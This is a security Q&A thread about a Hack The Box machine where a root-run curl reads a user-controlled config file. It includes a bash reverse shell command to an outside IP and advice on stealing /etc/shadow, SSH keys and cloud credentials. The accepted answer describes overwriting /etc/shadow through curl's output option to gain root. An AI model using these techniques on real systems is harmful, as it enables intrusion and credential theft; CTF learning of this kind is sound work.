Leveraging curl to spawn a shell

Question

So I'm doing a HTB challenge where I have leveraged the targets box use of reading a file that sets a url for curl in order to transverse down the directory and display the root flag in a report that is part of the exercise.

File Content: url = file:///127.0.0.1/../../../root/root.txt

All cool.

What I want to do is further leverage this to somehow spawn a shell by reading /bin/bash. I can read garbled version of /bin/bash in the report file but I cant figure how to execute it in a way that will give me an interactive shell.

What can I do in in order to achieve this?

EDIT:

I can create a reverse shell from my current user using bash and the below command, just cant get it to execute as I'd like from 'within' curl.

bash -i >& /dev/tcp/192.168.1.10/8080 0>&1

So curl is running on the target, and you can control the url it downloads? — davidbaumann, Nov 21 '18 at 16:40
Yes that's right. It is running as root so I want root to execute something and ideally call back to my listener or alike — 3therk1ll, Nov 21 '18 at 16:47
Maybe something related to this https://tools.cisco.com/security/center/viewAlert.x?alertId=57918 ? CVE-2018-1000300 — David Magalhães, Nov 21 '18 at 16:57
It is in teh vulnerable version range there. I'll check it out! — 3therk1ll, Nov 21 '18 at 17:40
Just FYI: there's no need to include a domain name and use path traversal when doing `file://` URIs. A URI like `file:///etc/shadow` is already absolute; its parts are the `file:` scheme, the `//` separator, and the `/etc/shadow` path. — CBHacking, Nov 22 '18 at 06:33

score 2 · Answer 1 · answered Nov 22 '18 at 06:27

Depending on how curl is launched, it may be vulnerable to parameter injection. Since you control one parameter already (the URL), you might be able to use characters such as spaces and apostrophes or quotation marks to inject a -o <file parameter, which would cause curl to write its output to that file. If you can do that, there are lots of options (especially since curl runs as root), such as dropping a crontab file with a command to invoke your program in a minute. Less likely to work but still worth checking is whether curl is running within a shell, in which case you may be able to use shell injection (such as backticks or $( ) around a command) to execute an arbitrary command directly.

There is no way for reading a file to directly cause code execution. However, you could try reading files that might be useful for getting remote access to the box. For example, check the SSH authorized keys, and see whether the corresponding private keys are present on the machine; if so, steal them and use them to SSH in (though you might need to break a password on the private key first). You could also try stealing the password hashes from /etc/shadow and cracking them; it's a long shot but maybe there's a weak password on one account that you can guess, and then use to SSH in with password auth. Alternatively, you could try to retrieve any cloud provider credentials (AWS or similar) and use them to gain control of the host through the cloud provider's infrastructure.

In the end I just created a new user in the shadow files etc. Dropped into a shell from there — 3therk1ll, Nov 22 '18 at 23:53
Using the output parameter? Or did you get write privileges as root some other way? — CBHacking, Nov 23 '18 at 07:23

3therk1ll · Accepted Answer · 2018-11-23T11:37:58.843

In case anybody is interested. The backend script was reading the file containing the url as a config file and writing as root so I changed the url and copied out the etc/shadow etc files and created a new user then read the edited files back the original locations, to then sudo into that user and get a shell.

I wasn't able to break out of curl itself.

I used the below method to first read the original /etc/shadow file and copy to a location I could view, then to edit the files with a new user and copy back.

Curl input file being from attacker being read by root

url = my_ip:port/edited_shadow

I added this below it for victim machine

output = /etc/shadow

This is roughly what I used as a guide...

http://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

There are of course easier ways to do this, write a new public key for example. But I wanted to try this method

score 0 · Answer 3 · edited Jan 22 '19 at 09:12

0

I just completed this box.

You can edit the sudoers file to give sudo permissions to the user. And then sudo your reverse shell command.

edited Jan 22 '19 at 09:12

schroeder

123,438
55
284
319

answered Jan 22 '19 at 08:52

lcw

1

You are violating the Terms and Conditions of Hack The Box by posting solutions to machines. Please delete your answer - and maybe the question entirely. – Tobi Nary Jan 22 '19 at 09:24
2

While those T&C may be binding for that user, they are hardly binding for this site, or any other persons. I would consider such an demand extremely rude... – vidarlo Jan 22 '19 at 12:14

Leveraging curl to spawn a shell

3 Answers3